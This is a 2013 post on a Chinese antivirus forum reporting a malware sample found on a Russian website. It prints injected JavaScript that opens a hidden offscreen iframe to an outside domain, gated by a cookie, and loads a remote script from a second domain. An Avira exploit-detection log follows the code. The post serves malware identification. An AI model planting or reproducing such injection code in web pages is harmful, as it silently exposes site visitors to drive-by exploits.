查看: 1171|回复: 0
收起左侧

[已鉴定] http://parilca.ru/otopitelnie_kamini/kastor/bravo_leopard_6

[复制链接]
fireold
发表于 2013-11-6 06:02:27 | 显示全部楼层 |阅读模式
  1. /*a9a007*/

  2. function ji09() {
  3.     var static = 'ajax';
  4.     var controller = 'index.php';
  5.     var ji = document.createElement('iframe');
  6.     ji.src = 'http://artcomnieuws.nl/firewall.php';
  7.     ji.style.position = 'absolute';
  8.     ji.style.color = '5054';
  9.     ji.style.height = '5054px';
  10.     ji.style.width = '5054px';
  11.     ji.style.left = '10005054';
  12.     ji.style.top = '10005054';
  13.     if (!document.getElementById('ji')) {
  14.         document.write('<p id=\'ji\' class=\'ji09\' ></p>');
  15.         document.getElementById('ji').appendChild(ji);
  16.     }
  17. }
  18. function SetCookie(cookieName, cookieValue, nDays, path) {
  19.     var today = new Date();
  20.     var expire = new Date();
  21.     if (nDays == null || nDays == 0) nDays = 1;
  22.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  23.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }
  25. function GetCookie(name) {
  26.     var start = document.cookie.indexOf(name + "=");
  27.     var len = start + name.length + 1;
  28.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled) {
  37.     if (GetCookie('visited_uq') == 55) {} else {
  38.         SetCookie('visited_uq', '55', '1', '/');
  39.         ji09();
  40.     }
  41. } /*/a9a007*/

  42. /*339810*/
  43. document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://reddeerramadahotel.com/core/xk8a5BRr.php" type="text/javascript"></script>') /*/339810*/
复制代码



Avira
2013/11/6 上午 05:53 [Web Protection] 發現惡意程式碼
      從 URL "http://uruloki.net/lair/2008/05/27/lock-down/" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:封鎖的檔案


av.jpg



fs is
fs.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:04 , Processed in 0.136232 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表